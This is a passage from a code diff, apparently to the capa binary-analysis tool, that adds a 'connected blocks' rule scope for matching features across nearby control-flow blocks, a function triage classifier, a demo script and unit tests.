_looks_like_runtime_name(name: str) -> bool: + lname = name.lower() + return lname.startswith(CRT_NAME_PREFIXES) or lname.startswith("j_") or lname.startswith("nullsub_") + + +def _get_function_name(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> str: + try: + return extractor.get_function_name(fh.address) + except KeyError: + return "" + + +def _get_section_name(fh: FunctionHandle) -> str: + inner = fh.inner + if inner is None: + return "" + section = getattr(inner, "section_name", "") + if isinstance(section, str): + return section + vw = getattr(inner, "vw", None) + va = getattr(inner, "va", None) + if vw is None or va is None: + return "" + for seg_va, seg_size, seg_name, _ in vw.getSegments(): + if seg_va <= va < seg_va + seg_size: + return seg_name + return "" + + +def _collect_size_and_signals(extractor: 
StaticFeatureExtractor, fh: FunctionHandle) -> tuple[int, int, bool, bool]: + bb_count = 0 + insn_count = 0 + has_api = False + is_thunk_candidate = False + + for bbh in extractor.get_basic_blocks(fh): + bb_count += 1 + instructions = list(extractor.get_instructions(fh, bbh)) + insn_count += len(instructions) + + if bb_count == 1 and 0 < len(instructions) <= 3: + last = instructions[-1].inner + mnem = getattr(last, "mnem", "") + if mnem in ("jmp", "ret"): + is_thunk_candidate = True + + for ih in instructions: + mnem = getattr(ih.inner, "mnem", "") + if isinstance(mnem, str) and mnem.lower().startswith("call"): + has_api = True + break + if has_api and bb_count > 1: + # for triage we only need API presence, not full counting. + continue + + is_thunk = bb_count == 1 and is_thunk_candidate + return bb_count, insn_count, has_api, is_thunk + + +def _has_api_feature_evidence(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> bool: + """ + confirm API evidence using extracted instruction features. + this avoids false negatives from mnemonic-only call heuristics. 
+ """ + for bbh in extractor.get_basic_blocks(fh): + for ih in extractor.get_instructions(fh, bbh): + for feature, _ in extractor.extract_insn_features(fh, bbh, ih): + if isinstance(feature, capa.features.insn.API): + return True + return False + + +def classify_function(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> TriageResult: + if fh.inner is None: + result = TriageResult(TriageDecision.ANALYZE, REASON_DEFAULT) + logger.debug( + "function triage: address=%s decision=%s reason=%s (no function context)", + fh.address, + result.decision.value, + result.reason, + ) + return result + + name = _get_function_name(extractor, fh) + section_name = _get_section_name(fh).lower() + bb_count, insn_count, has_api, is_thunk = _collect_size_and_signals(extractor, fh) + + if not has_api and (is_thunk or section_name in RUNTIME_SECTION_NAMES or (name and bb_count <= 1 and insn_count <= 4)): + has_api = _has_api_feature_evidence(extractor, fh) + + if name and _looks_like_runtime_name(name): + result = TriageResult(TriageDecision.SKIP, REASON_CRT_NAME) + elif is_thunk and not has_api: + result = TriageResult(TriageDecision.SKIP, REASON_THUNK) + elif section_name in RUNTIME_SECTION_NAMES and not has_api and insn_count <= 8: + result = TriageResult(TriageDecision.SKIP, REASON_RUNTIME_SECTION) + elif name and not has_api and bb_count <= 1 and insn_count <= 4: + # conservative skip: only very small/no-API helpers. 
+ result = TriageResult(TriageDecision.SKIP, REASON_TINY_NO_API) + elif bb_count >= 512 or insn_count >= 4096: + result = TriageResult(TriageDecision.DEPRIORITIZE, REASON_LARGE_COMPLEXITY) + else: + result = TriageResult(TriageDecision.ANALYZE, REASON_DEFAULT) + + logger.debug( + "function triage: address=%s decision=%s reason=%s bb=%d insn=%d has_api=%s thunk=%s section=%s name=%s", + fh.address, + result.decision.value, + result.reason, + bb_count, + insn_count, + has_api, + is_thunk, + section_name, + name, + ) + return result + + +def classify_library_function(fh: FunctionHandle) -> TriageResult: + result = TriageResult(TriageDecision.SKIP, REASON_LIBRARY) + logger.debug( + "function triage: address=%s decision=%s reason=%s", + fh.address, + result.decision.value, + result.reason, + ) + return result diff --git a/capa/features/extractors/base_extractor.py b/capa/features/extractors/base_extractor.py index 1be52d06b0..fb8f50e424 100644 --- a/capa/features/extractors/base_extractor.py +++ b/capa/features/extractors/base_extractor.py @@ -265,6 +265,14 @@ def extract_basic_block_features(self, f: FunctionHandle, bb: BBHandle) -> Itera """ raise NotImplementedError() + def get_cfg_edges(self, f: FunctionHandle, bb: BBHandle) -> Iterator[BBHandle]: + """ + enumerate successor basic blocks in the control-flow graph for a given basic block. + + backends without CFG support may yield nothing. 
+ """ + yield from () + @abc.abstractmethod def get_instructions(self, f: FunctionHandle, bb: BBHandle) -> Iterator[InsnHandle]: """ diff --git a/capa/features/extractors/viv/extractor.py b/capa/features/extractors/viv/extractor.py index 99d60e4a80..3882b69e89 100644 --- a/capa/features/extractors/viv/extractor.py +++ b/capa/features/extractors/viv/extractor.py @@ -16,6 +16,7 @@ from typing import Any, Iterator from pathlib import Path +import envi import viv_utils import viv_utils.flirt @@ -84,6 +85,27 @@ def get_instructions(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[InsnHa for insn in bb.instructions: yield InsnHandle(address=AbsoluteVirtualAddress(insn.va), inner=insn) + def get_cfg_edges(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[BBHandle]: + f: viv_utils.Function = fh.inner + bb: viv_utils.BasicBlock = bbh.inner + + bb_by_va = {b.va: b for b in f.basic_blocks} + if len(bb.instructions) == 0: + return + + last_insn = bb.instructions[-1] + for bva, bflags in last_insn.getBranches(): + if bva is None: + continue + + if ( + bflags & envi.BR_COND + or bflags & envi.BR_FALL + or bflags & envi.BR_TABLE + or last_insn.mnem == "jmp" + ) and bva in bb_by_va: + yield BBHandle(address=AbsoluteVirtualAddress(bva), inner=bb_by_va[bva]) + def extract_insn_features( self, fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle ) -> Iterator[tuple[Feature, Address]]: diff --git a/capa/ida/plugin/cache.py b/capa/ida/plugin/cache.py index d7cbfd10ac..9b019e25bd 100644 --- a/capa/ida/plugin/cache.py +++ b/capa/ida/plugin/cache.py @@ -17,6 +17,7 @@ import itertools import collections +from collections import deque from typing import Union, Optional import capa.engine @@ -160,19 +161,53 @@ def _find_basic_block_capabilities( return features, matches, insn_matches + def _build_connected_block_adjacency( + self, fh: FunctionHandle, f_node: CapaRuleGenFeatureCacheNode + ) -> dict[Address, set[Address]]: + adjacency: dict[Address, set[Address]] = 
collections.defaultdict(set) + bbs_by_address = {bb.address: bb for bb in f_node.children} + for bb in f_node.children: + adjacency[bb.address] + assert isinstance(bb.inner, BBHandle) + for succ in self.extractor.get_cfg_edges(fh, bb.inner): + if succ.address in bbs_by_address: + adjacency[bb.address].add(succ.address) + adjacency[succ.address].add(bb.address) + return adjacency + + @staticmethod + def _collect_connected_neighborhood( + adjacency: dict[Address, set[Address]], seed: Address, depth: int = 2 + ) -> set[Address]: + seen = {seed} + q = deque([(seed, 0)]) + while q: + node, d = q.popleft() + if d >= depth: + continue + for succ in adjacency.get(node, ()): + if succ in seen: + continue + seen.add(succ) + q.append((succ, d + 1)) + return seen + def find_code_capabilities( self, ruleset: RuleSet, fh: FunctionHandle - ) -> tuple[FeatureSet, MatchResults, MatchResults, MatchResults]: + ) -> tuple[FeatureSet, MatchResults, MatchResults, MatchResults, MatchResults]: f_node: Optional[CapaRuleGenFeatureCacheNode] = self._get_cached_func_node(fh) if f_node is None: - return {}, {}, {}, {} + return {}, {}, {}, {}, {} insn_matches: MatchResults = collections.defaultdict(list) bb_matches: MatchResults = collections.defaultdict(list) + connected_block_matches: MatchResults = collections.defaultdict(list) function_features: FeatureSet = collections.defaultdict(set) + bb_features_by_address: dict[Address, FeatureSet] = {} for bb in f_node.children: features, bmatches, imatches = self._find_basic_block_capabilities(ruleset, bb) + bb_features_by_address[bb.address] = features for feature, locs in features.items(): function_features[feature].update(locs) for name, result in bmatches.items(): @@ -180,11 +215,27 @@ def find_code_capabilities( for name, result in imatches.items(): insn_matches[name].extend(result) + if ruleset.connected_block_rules: + adjacency = self._build_connected_block_adjacency(fh, f_node) + for bb in f_node.children: + neighborhood = 
self._collect_connected_neighborhood(adjacency, bb.address, depth=2) + neighborhood_features: FeatureSet = collections.defaultdict(set) + for bb_addr in neighborhood: + for feature, locs in bb_features_by_address.get(bb_addr, {}).items(): + neighborhood_features[feature].update(locs) + + _, matches = ruleset.match(Scope.CONNECTED_BLOCKS, neighborhood_features, bb.address) + for name, result in matches.items(): + connected_block_matches[name].extend(result) + rule = ruleset[name] + for loc, _ in result: + capa.engine.index_rule_matches(function_features, rule, [loc]) + for feature, locs in itertools.chain(f_node.features.items(), self.global_features.items()): function_features[feature].update(locs) _, function_matches = ruleset.match(Scope.FUNCTION, function_features, f_node.address) - return function_features, function_matches, bb_matches, insn_matches + return function_features, function_matches, connected_block_matches, bb_matches, insn_matches def find_file_capabilities(self, ruleset: RuleSet) -> tuple[FeatureSet, MatchResults]: features: FeatureSet = collections.defaultdict(set) @@ -193,7 +244,7 @@ def find_file_capabilities(self, ruleset: RuleSet) -> tuple[FeatureSet, MatchRes assert func_node.inner is not None assert isinstance(func_node.inner, FunctionHandle) - func_features, _, _, _ = self.find_code_capabilities(ruleset, func_node.inner) + func_features, _, _, _, _ = self.find_code_capabilities(ruleset, func_node.inner) for feature, locs in func_features.items(): features[feature].update(locs) diff --git a/capa/ida/plugin/form.py b/capa/ida/plugin/form.py index 800453bbfa..600ad0ccb2 100644 --- a/capa/ida/plugin/form.py +++ b/capa/ida/plugin/form.py @@ -1028,14 +1028,16 @@ def load_capa_function_results(self): all_function_features: FeatureSet = collections.defaultdict(set) try: if self.rulegen_current_function is not None: - _, func_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( + _, func_matches, cbb_matches, 
bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( ruleset, self.rulegen_current_function ) all_function_features.update( self.rulegen_feature_cache.get_all_function_features(self.rulegen_current_function) ) - for name, result in itertools.chain(func_matches.items(), bb_matches.items(), insn_matches.items()): + for name, result in itertools.chain( + func_matches.items(), cbb_matches.items(), bb_matches.items(), insn_matches.items() + ): rule = ruleset[name] if rule.is_subscope_rule(): continue @@ -1204,12 +1206,13 @@ def update_rule_status(self, rule_text: str): s in rule.scopes for s in ( capa.rules.Scope.FUNCTION, + capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.BASIC_BLOCK, capa.rules.Scope.INSTRUCTION, ) ): try: - _, func_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( + _, func_matches, cbb_matches, bb_matches, insn_matches = self.rulegen_feature_cache.find_code_capabilities( ruleset, self.rulegen_current_function ) except Exception as e: @@ -1218,6 +1221,8 @@ def update_rule_status(self, rule_text: str): if capa.rules.Scope.FUNCTION in rule.scopes and rule.name in func_matches: is_match = True + elif capa.rules.Scope.CONNECTED_BLOCKS in rule.scopes and rule.name in cbb_matches: + is_match = True elif capa.rules.Scope.BASIC_BLOCK in rule.scopes and rule.name in bb_matches: is_match = True elif capa.rules.Scope.INSTRUCTION in rule.scopes and rule.name in insn_matches: diff --git a/capa/ida/plugin/model.py b/capa/ida/plugin/model.py index 046dc1ea3f..e600e5c0c7 100644 --- a/capa/ida/plugin/model.py +++ b/capa/ida/plugin/model.py @@ -530,7 +530,10 @@ def render_capa_doc_by_program(self, doc: rd.ResultDocument): parent2 = parent elif capa.rules.Scope.FUNCTION in rule.meta.scopes: parent2 = CapaExplorerFunctionItem(parent, location) - elif capa.rules.Scope.BASIC_BLOCK in rule.meta.scopes: + elif ( + capa.rules.Scope.BASIC_BLOCK in rule.meta.scopes + or capa.rules.Scope.CONNECTED_BLOCKS in 
rule.meta.scopes + ): parent2 = CapaExplorerBlockItem(parent, location) elif capa.rules.Scope.INSTRUCTION in rule.meta.scopes: parent2 = CapaExplorerInstructionItem(parent, location) diff --git a/capa/loader.py b/capa/loader.py index 88a159af35..253cd04cc5 100644 --- a/capa/loader.py +++ b/capa/loader.py @@ -729,7 +729,7 @@ def compute_static_layout(rules: RuleSet, extractor: StaticFeatureExtractor, cap matched_bbs = set() for rule_name, matches in capabilities.items(): rule = rules[rule_name] - if capa.rules.Scope.BASIC_BLOCK in rule.scopes: + if capa.rules.Scope.BASIC_BLOCK in rule.scopes or capa.rules.Scope.CONNECTED_BLOCKS in rule.scopes: for addr, _ in matches: assert addr in functions_by_bb matched_bbs.add(addr) diff --git a/capa/render/proto/__init__.py b/capa/render/proto/__init__.py index 31b272e525..f28d910f1f 100644 --- a/capa/render/proto/__init__.py +++ b/capa/render/proto/__init__.py @@ -155,6 +155,10 @@ def scope_to_pb2(scope: capa.rules.Scope) -> capa_pb2.Scope.ValueType: return capa_pb2.Scope.SCOPE_FILE elif scope == capa.rules.Scope.FUNCTION: return capa_pb2.Scope.SCOPE_FUNCTION + elif scope == capa.rules.Scope.CONNECTED_BLOCKS: + # protobuf schema does not yet have a dedicated static connected-block scope enum. + # encode as basic block for wire compatibility. 
+ return capa_pb2.Scope.SCOPE_BASIC_BLOCK elif scope == capa.rules.Scope.BASIC_BLOCK: return capa_pb2.Scope.SCOPE_BASIC_BLOCK elif scope == capa.rules.Scope.INSTRUCTION: diff --git a/capa/rules/__init__.py b/capa/rules/__init__.py index da0a7d0360..49170b1440 100644 --- a/capa/rules/__init__.py +++ b/capa/rules/__init__.py @@ -89,6 +89,7 @@ class Scope(str, Enum): SPAN_OF_CALLS = "span of calls" CALL = "call" FUNCTION = "function" + CONNECTED_BLOCKS = "connected blocks" BASIC_BLOCK = "basic block" INSTRUCTION = "instruction" @@ -107,6 +108,7 @@ def to_yaml(cls, representer, node): Scope.FILE, Scope.GLOBAL, Scope.FUNCTION, + Scope.CONNECTED_BLOCKS, Scope.BASIC_BLOCK, Scope.INSTRUCTION, } @@ -219,6 +221,10 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": capa.features.common.Characteristic("recursive call"), # plus basic block scope features, see below }, + Scope.CONNECTED_BLOCKS: { + capa.features.common.MatchedRule, + # plus basic block scope features, see below + }, Scope.BASIC_BLOCK: { capa.features.common.MatchedRule, capa.features.common.Characteristic("tight loop"), @@ -252,6 +258,7 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": # global scope features are available in all other scopes SUPPORTED_FEATURES[Scope.INSTRUCTION].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.BASIC_BLOCK].update(SUPPORTED_FEATURES[Scope.GLOBAL]) +SUPPORTED_FEATURES[Scope.CONNECTED_BLOCKS].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.FUNCTION].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.FILE].update(SUPPORTED_FEATURES[Scope.GLOBAL]) SUPPORTED_FEATURES[Scope.PROCESS].update(SUPPORTED_FEATURES[Scope.GLOBAL]) @@ -269,6 +276,8 @@ def from_dict(self, scopes: dict[str, str]) -> "Scopes": # all instruction scope features are also basic block features SUPPORTED_FEATURES[Scope.BASIC_BLOCK].update(SUPPORTED_FEATURES[Scope.INSTRUCTION]) +# all basic block scope features are also connected blocks features 
+SUPPORTED_FEATURES[Scope.CONNECTED_BLOCKS].update(SUPPORTED_FEATURES[Scope.BASIC_BLOCK]) # all basic block scope features are also function scope features SUPPORTED_FEATURES[Scope.FUNCTION].update(SUPPORTED_FEATURES[Scope.BASIC_BLOCK]) @@ -588,9 +597,31 @@ def unique(sequence): return [x for x in sequence if not (x in seen or seen.add(x))] # type: ignore [func-returns-value] +def parse_connected_blocks_subscope_key(key: str) -> bool: + """ + return True when the key denotes a connected-blocks subscope declaration. + + supported forms: + - connected blocks + - connected_blocks(depth=2) + """ + if key == "connected blocks": + return True + + if not key.startswith("connected_blocks(") or not key.endswith(")"): + return False + + body = key[len("connected_blocks(") : -len(")")] + if body != "depth=2": + raise InvalidRule("only connected_blocks(depth=2) is supported") + + return True + + STATIC_SCOPE_ORDER = [ Scope.FILE, Scope.FUNCTION, + Scope.CONNECTED_BLOCKS, Scope.BASIC_BLOCK, Scope.INSTRUCTION, ] @@ -707,7 +738,7 @@ def build_statements(d, scopes: Scopes): elif key == "basic block": if not is_subscope_compatible(scopes.static, Scope.BASIC_BLOCK): - raise InvalidRule("`basic block` subscope supported only for `function` scope") + raise InvalidRule("`basic block` subscope supported only for `function` and `connected blocks` scope") if len(d[key]) != 1: raise InvalidRule("subscope must have exactly one child statement") @@ -716,9 +747,25 @@ def build_statements(d, scopes: Scopes): Scope.BASIC_BLOCK, build_statements(d[key][0], Scopes(static=Scope.BASIC_BLOCK)), description=description ) + elif parse_connected_blocks_subscope_key(key): + if not is_subscope_compatible(scopes.static, Scope.CONNECTED_BLOCKS): + raise InvalidRule("`connected blocks` subscope supported only for `function` scope") + + if len(d[key]) != 1: + raise InvalidRule("subscope must have exactly one child statement") + + # MVP: fixed proximity depth=2 in static matching pipeline. 
+ return ceng.Subscope( + Scope.CONNECTED_BLOCKS, + build_statements(d[key][0], Scopes(static=Scope.CONNECTED_BLOCKS)), + description=description, + ) + elif key == "instruction": if not is_subscope_compatible(scopes.static, Scope.INSTRUCTION): - raise InvalidRule("`instruction` subscope supported only for `function` and `basic block` scope") + raise InvalidRule( + "`instruction` subscope supported only for `function`, `connected blocks`, and `basic block` scope" + ) if len(d[key]) == 1: statements = build_statements(d[key][0], Scopes(static=Scope.INSTRUCTION)) @@ -1433,6 +1480,7 @@ def __init__( Scope.PROCESS, Scope.INSTRUCTION, Scope.BASIC_BLOCK, + Scope.CONNECTED_BLOCKS, Scope.FUNCTION, Scope.FILE, ) @@ -1475,6 +1523,10 @@ def function_rules(self): def basic_block_rules(self): return self.rules_by_scope[Scope.BASIC_BLOCK] + @property + def connected_block_rules(self): + return self.rules_by_scope[Scope.CONNECTED_BLOCKS] + @property def instruction_rules(self): return self.rules_by_scope[Scope.INSTRUCTION] diff --git a/scripts/demo_connected_blocks_and_triage.py b/scripts/demo_connected_blocks_and_triage.py new file mode 100644 index 0000000000..ac8f9b7e8a --- /dev/null +++ b/scripts/demo_connected_blocks_and_triage.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python3 +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +""" +Demo helper for: + - function triage counts (skip/deprioritize/analyze) + - connected-block rule syntax +""" + +import argparse +import textwrap +from pathlib import Path +from collections import Counter +from typing import Counter as CounterType + +import capa.loader +import capa.rules +from capa.rules import Scope +from capa.capabilities.triage import TriageDecision, classify_function +from capa.features.extractors.viv.extractor import VivisectFeatureExtractor +from capa.features.common import OS_AUTO, FORMAT_AUTO + + +CONNECTED_BLOCKS_RULE = textwrap.dedent( + """ + rule: + meta: + name: demo connected blocks + scopes: + static: function + dynamic: process + features: + - connected blocks: + - and: + - api: kernel32.CreateFileA + - api: kernel32.WriteFile + """ +) + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("input", type=Path, help="sample path") + args = parser.parse_args() + + vw = capa.loader.get_workspace(args.input, FORMAT_AUTO, sigpaths=[]) + extractor = VivisectFeatureExtractor(vw, args.input, OS_AUTO) + + triage_counts: CounterType[str] = Counter() + for fh in extractor.get_functions(): + if extractor.is_library_function(fh.address): + triage_counts[TriageDecision.SKIP.value] += 1 + continue + triage = classify_function(extractor, fh) + triage_counts[triage.decision.value] += 1 + + print("triage counts:") + print(f" analyze : {triage_counts[TriageDecision.ANALYZE.value]}") + print(f" deprioritize : {triage_counts[TriageDecision.DEPRIORITIZE.value]}") + print(f" skip : {triage_counts[TriageDecision.SKIP.value]}") + print() + print("connected blocks rule syntax:") + print(CONNECTED_BLOCKS_RULE.strip()) + + r = capa.rules.Rule.from_yaml(CONNECTED_BLOCKS_RULE) + print() + print("parsed rule scopes:", r.scopes) + print("connected blocks scope literal:", Scope.CONNECTED_BLOCKS.value) + + +if __name__ == "__main__": + main() diff --git a/tests/test_capabilities.py b/tests/test_capabilities.py index 809173da22..df44b9a45e 
100644 --- a/tests/test_capabilities.py +++ b/tests/test_capabilities.py @@ -346,3 +346,28 @@ def test_instruction_subscope(z9324d_extractor): capabilities = capa.capabilities.common.find_capabilities(rules, z9324d_extractor) assert "push 1000 on i386" in capabilities.matches assert 0x406F60 in {result[0] for result in capabilities.matches["push 1000 on i386"]} + + +def test_connected_blocks_subscope(z9324d_extractor): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected block helper + scopes: + static: function + dynamic: process + features: + - connected blocks: + - and: + - api: kernel32.TerminateThread + """ + ) + ) + ] + ) + capabilities = capa.capabilities.common.find_capabilities(rules, z9324d_extractor) + assert "connected block helper" in capabilities.matches diff --git a/tests/test_connected_blocks.py b/tests/test_connected_blocks.py new file mode 100644 index 0000000000..4419c13fa0 --- /dev/null +++ b/tests/test_connected_blocks.py @@ -0,0 +1,158 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import textwrap + +import capa.rules +from capa.features.insn import API +from capa.features.address import AbsoluteVirtualAddress +from capa.features.extractors.null import ( + FunctionFeatures, + BasicBlockFeatures, + InstructionFeatures, + NullStaticFeatureExtractor, +) +from capa.features.extractors.base_extractor import BBHandle, SampleHashes +from capa.capabilities.common import find_capabilities + + +class GraphNullStaticExtractor(NullStaticFeatureExtractor): + def __init__(self, *args, edges=None, **kwargs): + super().__init__(*args, **kwargs) + self._edges = edges or {} + + def get_cfg_edges(self, f, bb): + for succ in self._edges.get(int(f.address), {}).get(int(bb.address), []): + yield BBHandle(AbsoluteVirtualAddress(succ), None) + + +def make_graph_extractor(): + fva = AbsoluteVirtualAddress(0x401000) + b0 = AbsoluteVirtualAddress(0x401000) + b1 = AbsoluteVirtualAddress(0x401100) + b2 = AbsoluteVirtualAddress(0x401200) + b3 = AbsoluteVirtualAddress(0x401300) + b4 = AbsoluteVirtualAddress(0x401400) + b5 = AbsoluteVirtualAddress(0x401500) + + return GraphNullStaticExtractor( + base_address=AbsoluteVirtualAddress(0x400000), + sample_hashes=SampleHashes(md5="", sha1="", sha256=""), + global_features=[], + file_features=[], + functions={ + fva: FunctionFeatures( + features=[], + basic_blocks={ + b0: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401001): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401001), API("CreateFileA"))] + ) + }, + ), + b1: BasicBlockFeatures(features=[], instructions={}), + b2: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401201): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401201), API("WriteFile"))] + ) + }, + ), + b3: BasicBlockFeatures( + features=[], + instructions={}, + ), + b4: BasicBlockFeatures( + features=[], + instructions={}, + ), + b5: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401501): 
InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401501), API("CloseHandle"))] + ) + }, + ), + }, + ) + }, + edges={ + int(fva): { + int(b0): [int(b1)], + int(b1): [int(b2)], + int(b2): [int(b3)], + int(b3): [int(b4)], + int(b4): [int(b5)], + } + }, + ) + + +def test_connected_blocks_depth2_match(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected blocks depth2 + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - api: CreateFileA + - api: WriteFile + """ + ) + ), + ] + ) + capabilities = find_capabilities(rules, make_graph_extractor()) + assert "connected blocks depth2" in capabilities.matches + assert AbsoluteVirtualAddress(0x401000) in {m[0] for m in capabilities.matches["connected blocks depth2"]} + + +def test_connected_blocks_too_far_no_match(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected blocks too far + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - api: CreateFileA + - api: CloseHandle + """ + ) + ), + ] + ) + capabilities = find_capabilities(rules, make_graph_extractor()) + assert "connected blocks too far" not in capabilities.matches diff --git a/tests/test_proto.py b/tests/test_proto.py index b0dc106040..8ce69bac19 100644 --- a/tests/test_proto.py +++ b/tests/test_proto.py @@ -125,6 +125,7 @@ def test_addr_to_pb2(): def test_scope_to_pb2(): assert capa.render.proto.scope_to_pb2(capa.rules.Scope.FILE) == capa_pb2.SCOPE_FILE assert capa.render.proto.scope_to_pb2(capa.rules.Scope.FUNCTION) == capa_pb2.SCOPE_FUNCTION + assert capa.render.proto.scope_to_pb2(capa.rules.Scope.CONNECTED_BLOCKS) == capa_pb2.SCOPE_BASIC_BLOCK assert capa.render.proto.scope_to_pb2(capa.rules.Scope.BASIC_BLOCK) == capa_pb2.SCOPE_BASIC_BLOCK assert capa.render.proto.scope_to_pb2(capa.rules.Scope.INSTRUCTION) == 
capa_pb2.SCOPE_INSTRUCTION assert capa.render.proto.scope_to_pb2(capa.rules.Scope.PROCESS) == capa_pb2.SCOPE_PROCESS @@ -313,6 +314,17 @@ def assert_feature(fa, fb): elif isinstance(fa, capa.features.freeze.features.APIFeature): assert fa.api == fb.api + elif isinstance(fa, capa.features.freeze.features.ArgumentStringFeature): + assert fa.name == fb.name + assert fa.argument_string == fb.argument_string + + elif isinstance(fa, capa.features.freeze.features.ArgumentNumberFeature): + assert fa.name == fb.name + assert fa.argument_number == getattr(fb.argument_number, fb.argument_number.WhichOneof("value")) + + elif isinstance(fa, capa.features.freeze.features.ReturnValueFeature): + assert fa.return_value == getattr(fb.return_value, fb.return_value.WhichOneof("value")) + elif isinstance(fa, capa.features.freeze.features.PropertyFeature): assert fa.property == fb.property_ assert fa.access == fb.access diff --git a/tests/test_rules_insn_scope.py b/tests/test_rules_insn_scope.py index 86ebcd35b2..7402bb689e 100644 --- a/tests/test_rules_insn_scope.py +++ b/tests/test_rules_insn_scope.py @@ -131,6 +131,42 @@ def test_scope_instruction_description(): ) ) + +def test_rule_subscope_connected_blocks(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: test connected blocks subscope + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - mnemonic: mov + - arch: i386 + """ + ) + ) + ] + ) + + # parent function scope rule + derived connected-blocks subscope rule. 
+ assert len(rules.function_rules) == 1 + assert len(rules.connected_block_rules) == 1 + + +def test_scope_connected_blocks_ordering(): + assert capa.rules.is_subscope_compatible(capa.rules.Scope.FUNCTION, capa.rules.Scope.CONNECTED_BLOCKS) + assert capa.rules.is_subscope_compatible(capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.BASIC_BLOCK) + assert capa.rules.is_subscope_compatible(capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.INSTRUCTION) + assert not capa.rules.is_subscope_compatible(capa.rules.Scope.BASIC_BLOCK, capa.rules.Scope.CONNECTED_BLOCKS) + capa.rules.Rule.from_yaml( textwrap.dedent( """ diff --git a/tests/test_triage.py b/tests/test_triage.py new file mode 100644 index 0000000000..57a783f492 --- /dev/null +++ b/tests/test_triage.py @@ -0,0 +1,145 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from capa.features.insn import API +from capa.features.address import AbsoluteVirtualAddress +from capa.capabilities.triage import ( + REASON_CRT_NAME, + REASON_LARGE_COMPLEXITY, + REASON_TINY_NO_API, + TriageDecision, + classify_function, +) +from capa.features.extractors.base_extractor import BBHandle, InsnHandle, FunctionHandle, SampleHashes, StaticFeatureExtractor + + +class FakeInsn: + def __init__(self, mnem: str = "nop"): + self.mnem = mnem + + +class FakeFunction: + section_name = ".text" + + +class FakeTriageExtractor(StaticFeatureExtractor): + def __init__(self, names=None, function_data=None): + super().__init__(SampleHashes(md5="", sha1="", sha256="")) + self.names = names or {} + self.function_data = function_data or {} + + def get_base_address(self): + return AbsoluteVirtualAddress(0x0) + + def extract_global_features(self): + yield from () + + def extract_file_features(self): + yield from () + + def get_functions(self): + for fva in sorted(self.function_data): + yield FunctionHandle(AbsoluteVirtualAddress(fva), FakeFunction()) + + def get_function_name(self, addr): + if int(addr) not in self.names: + raise KeyError(addr) + return self.names[int(addr)] + + def extract_function_features(self, f): + yield from () + + def get_basic_blocks(self, f): + for bva in sorted(self.function_data[int(f.address)]["bbs"]): + yield BBHandle(AbsoluteVirtualAddress(bva), None) + + def extract_basic_block_features(self, f, bb): + yield from () + + def get_instructions(self, f, bb): + for iva, mnem in self.function_data[int(f.address)]["bbs"][int(bb.address)]: + yield InsnHandle(AbsoluteVirtualAddress(iva), FakeInsn(mnem)) + + def extract_insn_features(self, f, bb, insn): + for feature in self.function_data[int(f.address)].get("insn_features", {}).get(int(insn.address), ()): + yield feature, insn.address + + +def test_triage_classify_crt_name_skip(): + extractor = FakeTriageExtractor( + names={0x401000: "__security_init_cookie"}, + function_data={0x401000: {"bbs": 
